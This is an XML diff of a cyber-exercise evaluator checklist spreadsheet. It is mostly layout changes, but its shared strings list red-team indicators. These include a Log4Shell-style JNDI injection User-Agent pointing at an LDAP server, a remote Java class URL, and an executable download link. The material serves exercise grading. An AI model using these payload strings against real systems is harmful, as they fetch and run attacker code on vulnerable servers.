-      <c r="A26" s="18">
-        <v>6</v>
-      </c>
-      <c r="B26" s="19" t="s">
-        <v>57</v>
-      </c>
-      <c r="C26" s="19" t="s">
-        <v>14</v>
-      </c>
-      <c r="D26" s="20" t="s">
-        <v>60</v>
-      </c>
-    </row>
-    <row r="27" spans="1:4" ht="30.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A27" s="22">
-        <v>6</v>
-      </c>
-      <c r="B27" s="23" t="s">
-        <v>40</v>
-      </c>
-      <c r="C27" s="23" t="s">
-        <v>41</v>
-      </c>
-      <c r="D27" s="24" t="s">
-        <v>42</v>
       </c>
     </row>
   </sheetData>
@@ -1486,6 +1645,7 @@
     <mergeCell ref="A1:D1"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup orientation="portrait" horizontalDpi="4294967293" verticalDpi="0" r:id="rId1"/>
 </worksheet>
 </file>
 
@@ -1494,7 +1654,7 @@
   <dimension ref="A1:F6"/>
   <sheetViews>
     <sheetView workbookViewId="0">
-      <selection activeCell="E2" sqref="A2:E2"/>
+      <selection activeCell="A38" sqref="A38"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1506,98 +1666,98 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:6" ht="19.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A1" s="4" t="s">
+      <c r="A1" s="33" t="s">
+        <v>40</v>
+      </c>
+      <c r="B1" s="34"/>
+      <c r="C1" s="34"/>
+      <c r="D1" s="34"/>
+      <c r="E1" s="35"/>
+      <c r="F1" s="3"/>
+    </row>
+    <row r="2" spans="1:6" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A2" s="23" t="s">
+        <v>42</v>
+      </c>
+      <c r="B2" s="24" t="s">
+        <v>41</v>
+      </c>
+      <c r="C2" s="24" t="s">
+        <v>86</v>
+      </c>
+      <c r="D2" s="25" t="s">
         <v>43</v>
       </c>
-      <c r="B1" s="5"/>
-      <c r="C1" s="5"/>
-      <c r="D1" s="5"/>
-      <c r="E1" s="6"/>
-      <c r="F1" s="3"/>
-    </row>
-    <row r="2" spans="1:6" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A2" s="31" t="s">
+      <c r="E2" s="26" t="s">
+        <v>44</v>
+      </c>
+    </row>
+    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A3" s="17" t="s">
         <v>45</v>
       </c>
-      <c r="B2" s="32" t="s">
-        <v>44</v>
-      </c>
-      <c r="C2" s="32" t="s">
-        <v>1</v>
-      </c>
-      <c r="D2" s="33" t="s">
+      <c r="B3" s="18" t="s">
+        <v>17</v>
+      </c>
+      <c r="C3" s="18" t="s">
+        <v>47</v>
+      </c>
+      <c r="D3" s="18" t="s">
         <v>46</v>
       </c>
-      <c r="E2" s="34" t="s">
+      <c r="E3" s="19" t="s">
+        <v>58</v>
+      </c>
+    </row>
+    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A4" s="17" t="s">
+        <v>45</v>
+      </c>
+      <c r="B4" s="18" t="s">
+        <v>24</v>
+      </c>
+      <c r="C4" s="18" t="s">
         <v>47</v>
       </c>
-    </row>
-    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
-      <c r="A3" s="25" t="s">
+      <c r="D4" s="18" t="s">
+        <v>49</v>
+      </c>
+      <c r="E4" s="19" t="s">
+        <v>59</v>
+      </c>
+    </row>
+    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
+      <c r="A5" s="17" t="s">
+        <v>45</v>
+      </c>
+      <c r="B5" s="18" t="s">
+        <v>54</v>
+      </c>
+      <c r="C5" s="18" t="s">
+        <v>47</v>
+      </c>
+      <c r="D5" s="18" t="s">
+        <v>53</v>
+      </c>
+      <c r="E5" s="19" t="s">
+        <v>60</v>
+      </c>
+    </row>
+    <row r="6" spans="1:6" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A6" s="20" t="s">
+        <v>45</v>
+      </c>
+      <c r="B6" s="21" t="s">
+        <v>27</v>
+      </c>
+      <c r="C6" s="21" t="s">
         <v>48</v>
       </c>
-      <c r="B3" s="26" t="s">
-        <v>17</v>
-      </c>
-      <c r="C3" s="26" t="s">
+      <c r="D6" s="21" t="s">
         <v>50</v>
       </c>
-      <c r="D3" s="26" t="s">
-        <v>49</v>
-      </c>
-      <c r="E3" s="27" t="s">
-        <v>61</v>
-      </c>
-    </row>
-    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
-      <c r="A4" s="25" t="s">
-        <v>48</v>
-      </c>
-      <c r="B4" s="26" t="s">
-        <v>24</v>
-      </c>
-      <c r="C4" s="26" t="s">
-        <v>50</v>
-      </c>
-      <c r="D4" s="26" t="s">
+      <c r="E6" s="22" t="s">
         <v>52</v>
-      </c>
-      <c r="E4" s="27" t="s">
-        <v>62</v>
-      </c>
-    </row>
-    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
-      <c r="A5" s="25" t="s">
-        <v>48</v>
-      </c>
-      <c r="B5" s="26" t="s">
-        <v>57</v>
-      </c>
-      <c r="C5" s="26" t="s">
-        <v>50</v>
-      </c>
-      <c r="D5" s="26" t="s">
-        <v>56</v>
-      </c>
-      <c r="E5" s="27" t="s">
-        <v>63</v>
-      </c>
-    </row>
-    <row r="6" spans="1:6" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A6" s="28" t="s">
-        <v>48</v>
-      </c>
-      <c r="B6" s="29" t="s">
-        <v>29</v>
-      </c>
-      <c r="C6" s="29" t="s">
-        <v>51</v>
-      </c>
-      <c r="D6" s="29" t="s">
-        <v>53</v>
-      </c>
-      <c r="E6" s="30" t="s">
-        <v>55</v>
       </c>
     </row>
   </sheetData>
@@ -1613,8 +1773,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{F8D11AE9-DBEB-4CF3-93F4-339AD2CB4E95}">
   <dimension ref="A1:B14"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="F15" sqref="F15"/>
+    <sheetView workbookViewId="0">
+      <selection activeCell="A11" sqref="A11"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1623,113 +1783,113 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:2" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A1" s="7" t="s">
+      <c r="A1" s="36" t="s">
+        <v>63</v>
+      </c>
+      <c r="B1" s="37"/>
+    </row>
+    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A2" s="27" t="s">
+        <v>61</v>
+      </c>
+      <c r="B2" s="28" t="s">
+        <v>62</v>
+      </c>
+    </row>
+    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A3" s="29" t="s">
+        <v>64</v>
+      </c>
+      <c r="B3" s="29" t="s">
         <v>66</v>
       </c>
-      <c r="B1" s="8"/>
-    </row>
-    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A2" s="35" t="s">
-        <v>64</v>
-      </c>
-      <c r="B2" s="36" t="s">
+    </row>
+    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A4" s="29" t="s">
+        <v>67</v>
+      </c>
+      <c r="B4" s="29" t="s">
         <v>65</v>
       </c>
     </row>
-    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A3" s="37" t="s">
-        <v>67</v>
-      </c>
-      <c r="B3" s="37" t="s">
+    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A5" s="29" t="s">
         <v>69</v>
       </c>
-    </row>
-    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A4" s="37" t="s">
+      <c r="B5" s="29" t="s">
         <v>70</v>
       </c>
-      <c r="B4" s="37" t="s">
+    </row>
+    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A6" s="29" t="s">
+        <v>77</v>
+      </c>
+      <c r="B6" s="29" t="s">
+        <v>78</v>
+      </c>
+    </row>
+    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A7" s="29" t="s">
+        <v>81</v>
+      </c>
+      <c r="B7" s="29" t="s">
+        <v>82</v>
+      </c>
+    </row>
+    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A8" s="29" t="s">
+        <v>71</v>
+      </c>
+      <c r="B8" s="29" t="s">
+        <v>72</v>
+      </c>
+    </row>
+    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A9" s="29" t="s">
+        <v>73</v>
+      </c>
+      <c r="B9" s="29" t="s">
+        <v>83</v>
+      </c>
+    </row>
+    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A10" s="29" t="s">
+        <v>75</v>
+      </c>
+      <c r="B10" s="29" t="s">
+        <v>74</v>
+      </c>
+    </row>
+    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A11" s="29" t="s">
+        <v>79</v>
+      </c>
+      <c r="B11" s="29" t="s">
+        <v>80</v>
+      </c>
+    </row>
+    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A12" s="29" t="s">
+        <v>76</v>
+      </c>
+      <c r="B12" s="29" t="s">
+        <v>74</v>
+      </c>
+    </row>
+    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A13" s="29" t="s">
+        <v>45</v>
+      </c>
+      <c r="B13" s="29" t="s">
         <v>68</v>
       </c>
     </row>
-    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A5" s="37" t="s">
-        <v>72</v>
-      </c>
-      <c r="B5" s="37" t="s">
-        <v>73</v>
-      </c>
-    </row>
-    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A6" s="37" t="s">
-        <v>80</v>
-      </c>
-      <c r="B6" s="37" t="s">
-        <v>81</v>
-      </c>
-    </row>
-    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A7" s="37" t="s">
+    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A14" s="29" t="s">
         <v>84</v>
       </c>
-      <c r="B7" s="37" t="s">
+      <c r="B14" s="29" t="s">
         <v>85</v>
-      </c>
-    </row>
-    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A8" s="37" t="s">
-        <v>74</v>
-      </c>
-      <c r="B8" s="37" t="s">
-        <v>75</v>
-      </c>
-    </row>
-    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A9" s="37" t="s">
-        <v>76</v>
-      </c>
-      <c r="B9" s="37" t="s">
-        <v>86</v>
-      </c>
-    </row>
-    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A10" s="37" t="s">
-        <v>78</v>
-      </c>
-      <c r="B10" s="37" t="s">
-        <v>77</v>
-      </c>
-    </row>
-    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A11" s="37" t="s">
-        <v>82</v>
-      </c>
-      <c r="B11" s="37" t="s">
-        <v>83</v>
-      </c>
-    </row>
-    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A12" s="37" t="s">
-        <v>79</v>
-      </c>
-      <c r="B12" s="37" t="s">
-        <v>77</v>
-      </c>
-    </row>
-    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A13" s="37" t="s">
-        <v>48</v>
-      </c>
-      <c r="B13" s="37" t="s">
-        <v>71</v>
-      </c>
-    </row>
-    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
-      <c r="A14" s="37" t="s">
-        <v>87</v>
-      </c>
-      <c r="B14" s="37" t="s">
-        <v>88</v>
       </c>
     </row>
   </sheetData>
@@ -1741,4 +1901,319 @@
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>
+</file>
+
+<file path=xl/worksheets/sheet4.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{87057FDC-5D84-46BE-B638-DC1D236D0E0E}">
+  <dimension ref="A1:D29"/>
+  <sheetViews>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="C25" sqref="C25"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
+  <cols>
+    <col min="1" max="1" width="6.28515625" bestFit="1" customWidth="1"/>
+    <col min="2" max="2" width="18.5703125" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="124.140625" bestFit="1" customWidth="1"/>
+  </cols>
+  <sheetData>
+    <row r="1" spans="1:3" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A1" s="42" t="s">
+        <v>87</v>
+      </c>
+      <c r="B1" s="43"/>
+      <c r="C1" s="44"/>
+    </row>
+    <row r="2" spans="1:3" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A2" s="45" t="s">
+        <v>88</v>
+      </c>
+      <c r="B2" s="46" t="s">
+        <v>89</v>
+      </c>
+      <c r="C2" s="47" t="s">
+        <v>99</v>
+      </c>
+    </row>
+    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A3" s="7">
+        <v>1</v>
+      </c>
+      <c r="B3" s="48" t="s">
+        <v>100</v>
+      </c>
+      <c r="C3" s="49" t="s">
+        <v>109</v>
+      </c>
+    </row>
+    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A4" s="10">
+        <v>1</v>
+      </c>
+      <c r="B4" s="50" t="s">
+        <v>100</v>
+      </c>
+      <c r="C4" s="51" t="s">
+        <v>110</v>
+      </c>
+    </row>
+    <row r="5" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A5" s="10">
+        <v>1</v>
+      </c>
+      <c r="B5" s="50" t="s">
+        <v>97</v>
+      </c>
+      <c r="C5" s="51" t="s">
+        <v>98</v>
+      </c>
+    </row>
+    <row r="6" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A6" s="52">
+        <v>1</v>
+      </c>
+      <c r="B6" s="53" t="s">
+        <v>90</v>
+      </c>
+      <c r="C6" s="51" t="s">
+        <v>91</v>
+      </c>
+    </row>
+    <row r="7" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A7" s="52"/>
+      <c r="B7" s="53"/>
+      <c r="C7" s="51" t="s">
+        <v>92</v>
+      </c>
+    </row>
+    <row r="8" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A8" s="52"/>
+      <c r="B8" s="53"/>
+      <c r="C8" s="51" t="s">
+        <v>96</v>
+      </c>
+    </row>
+    <row r="9" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A9" s="52"/>
+      <c r="B9" s="53"/>
+      <c r="C9" s="51" t="s">
+        <v>93</v>
+      </c>
+    </row>
+    <row r="10" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A10" s="52"/>
+      <c r="B10" s="53"/>
+      <c r="C10" s="51" t="s">
+        <v>94</v>
+      </c>
+    </row>
+    <row r="11" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A11" s="52"/>
+      <c r="B11" s="53"/>
+      <c r="C11" s="51" t="s">
+        <v>95</v>
+      </c>
+    </row>
+    <row r="12" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A12" s="10">
+        <v>2</v>
+      </c>
+      <c r="B12" s="50" t="s">
+        <v>100</v>
+      </c>
+      <c r="C12" s="51" t="s">
+        <v>111</v>
+      </c>
+    </row>
+    <row r="13" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A13" s="10">
+        <v>2</v>
+      </c>
+      <c r="B13" s="50" t="s">
+        <v>101</v>
+      </c>
+      <c r="C13" s="51" t="s">
+        <v>102</v>
+      </c>
+    </row>
+    <row r="14" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A14" s="10">
+        <v>2</v>
+      </c>
+      <c r="B14" s="50" t="s">
+        <v>90</v>
+      </c>
+      <c r="C14" s="51" t="s">
+        <v>103</v>
+      </c>
+    </row>
+    <row r="15" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A15" s="10">
+        <v>3</v>
+      </c>
+      <c r="B15" s="50" t="s">
+        <v>100</v>
+      </c>
+      <c r="C15" s="51" t="s">
+        <v>112</v>
+      </c>
+    </row>
+    <row r="16" spans="1:3" x14ac:dyDescent="0.25">
+      <c r="A16" s="10">
+        <v>3</v>
+      </c>
+      <c r="B16" s="50" t="s">
+        <v>101</v>
+      </c>
+      <c r="C16" s="51" t="s">
+        <v>104</v>
+      </c>
+    </row>
+    <row r="17" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A17" s="10">
+        <v>3</v>
+      </c>
+      <c r="B17" s="50" t="s">
+        <v>90</v>
+      </c>
+      <c r="C17" s="51" t="s">
+        <v>105</v>
+      </c>
+    </row>
+    <row r="18" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A18" s="10">
+        <v>3</v>
+      </c>
+      <c r="B18" s="50" t="s">
+        <v>90</v>
+      </c>
+      <c r="C18" s="51" t="s">
+        <v>106</v>
+      </c>
+    </row>
+    <row r="19" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A19" s="10">
+        <v>4</v>
+      </c>
+      <c r="B19" s="50" t="s">
+        <v>100</v>
+      </c>
+      <c r="C19" s="51" t="s">
+        <v>113</v>
+      </c>
+    </row>
+    <row r="20" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A20" s="10">
+        <v>4</v>
+      </c>
+      <c r="B20" s="50" t="s">
+        <v>100</v>
+      </c>
+      <c r="C20" s="51" t="s">
+        <v>114</v>
+      </c>
+    </row>
+    <row r="21" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A21" s="52">
+        <v>4</v>
+      </c>
+      <c r="B21" s="53" t="s">
+        <v>90</v>
+      </c>
+      <c r="C21" s="40" t="s">
+        <v>126</v>
+      </c>
+    </row>
+    <row r="22" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A22" s="52"/>
+      <c r="B22" s="53"/>
+      <c r="C22" s="40" t="s">
+        <v>127</v>
+      </c>
+    </row>
+    <row r="23" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A23" s="52"/>
+      <c r="B23" s="53"/>
+      <c r="C23" s="38" t="s">
+        <v>124</v>
+      </c>
+      <c r="D23" s="39"/>
+    </row>
+    <row r="24" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A24" s="10">
+        <v>4</v>
+      </c>
+      <c r="B24" s="50" t="s">
+        <v>115</v>
+      </c>
+      <c r="C24" s="40" t="s">
+        <v>125</v>
+      </c>
+      <c r="D24" s="39"/>
+    </row>
+    <row r="25" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A25" s="10">
+        <v>4</v>
+      </c>
+      <c r="B25" s="50" t="s">
+        <v>122</v>
+      </c>
+      <c r="C25" s="51" t="s">
+        <v>123</v>
+      </c>
+      <c r="D25" s="39"/>
+    </row>
+    <row r="26" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A26" s="52">
+        <v>5</v>
+      </c>
+      <c r="B26" s="53" t="s">
+        <v>90</v>
+      </c>
+      <c r="C26" s="51" t="s">
+        <v>118</v>
+      </c>
+    </row>
+    <row r="27" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A27" s="52"/>
+      <c r="B27" s="53"/>
+      <c r="C27" s="51" t="s">
+        <v>119</v>
+      </c>
+    </row>
+    <row r="28" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A28" s="10">
+        <v>5</v>
+      </c>
+      <c r="B28" s="50" t="s">
+        <v>117</v>
+      </c>
+      <c r="C28" s="51" t="s">
+        <v>116</v>
+      </c>
+    </row>
+    <row r="29" spans="1:4" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A29" s="14">
+        <v>6</v>
+      </c>
+      <c r="B29" s="54" t="s">
+        <v>90</v>
+      </c>
+      <c r="C29" s="41" t="s">
+        <v>120</v>
+      </c>
+    </row>
+  </sheetData>
+  <mergeCells count="7">
+    <mergeCell ref="B6:B11"/>
+    <mergeCell ref="A6:A11"/>
+    <mergeCell ref="A21:A23"/>
+    <mergeCell ref="B21:B23"/>
+    <mergeCell ref="A1:C1"/>
+    <mergeCell ref="B26:B27"/>
+    <mergeCell ref="A26:A27"/>
+  </mergeCells>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+</worksheet>
 </file>
</xml_diff>

<commit_message>
ReverseShell -> Togepi & Updated Eval Checklist
</commit_message>
<xml_diff>
--- a/CyberChallengeEvaluatorChecklist.xlsx
+++ b/CyberChallengeEvaluatorChecklist.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\jonathan\Documents\GitHub\CyberChallenge\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6574BF17-7F4A-4E0B-8C7E-6C941449C919}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D59D8DEA-12CD-4CEE-9FA6-623FBFB79525}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" activeTab="3" xr2:uid="{D3576344-A792-4353-B944-796ECB867907}"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" xr2:uid="{D3576344-A792-4353-B944-796ECB867907}"/>
   </bookViews>
   <sheets>
     <sheet name="Red Actions on Objectives" sheetId="1" r:id="rId1"/>
@@ -417,16 +417,16 @@
     <t>TCP Connection to service on port 9001</t>
   </si>
   <si>
-    <t>http://94.249.192.5:8000/JuicyPotato.exe (name change)</t>
-  </si>
-  <si>
-    <t>ldap://94.249.192.1:1387/C (name change)</t>
-  </si>
-  <si>
-    <t>Malformed User-Agent: ${jndi:ldap://94.249.192.1:1387/C} (name change)</t>
-  </si>
-  <si>
-    <t>http://94.249.192.1:1337/C.class (name change)</t>
+    <t>Malformed User-Agent: ${jndi:ldap://94.249.192.1:1387/Togepi}</t>
+  </si>
+  <si>
+    <t>http://94.249.192.1:1337/Togepi.class</t>
+  </si>
+  <si>
+    <t>http://94.249.192.5:8000/zapdos.exe</t>
+  </si>
+  <si>
+    <t>ldap://94.249.192.1:1387/Togepi</t>
   </si>
 </sst>
 </file>
@@ -793,7 +793,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="55">
+  <cellXfs count="53">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -882,43 +882,7 @@
     <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="0" fillId="2" borderId="3" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="0" fillId="2" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center" vertical="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1"/>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
-    <xf numFmtId="0" fontId="0" fillId="2" borderId="10" xfId="0" applyFill="1" applyBorder="1"/>
     <xf numFmtId="0" fontId="0" fillId="2" borderId="13" xfId="0" applyFill="1" applyBorder="1"/>
-    <xf numFmtId="0" fontId="2" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="2" fillId="2" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="0" fontId="2" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
     <xf numFmtId="0" fontId="0" fillId="3" borderId="17" xfId="0" applyFill="1" applyBorder="1"/>
     <xf numFmtId="0" fontId="0" fillId="3" borderId="18" xfId="0" applyFill="1" applyBorder="1"/>
     <xf numFmtId="0" fontId="0" fillId="3" borderId="19" xfId="0" applyFill="1" applyBorder="1"/>
@@ -930,15 +894,49 @@
       <alignment horizontal="left" vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="4" borderId="10" xfId="0" applyFill="1" applyBorder="1"/>
-    <xf numFmtId="0" fontId="0" fillId="4" borderId="9" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="4" borderId="12" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="3" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="4" borderId="12" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center"/>
-    </xf>
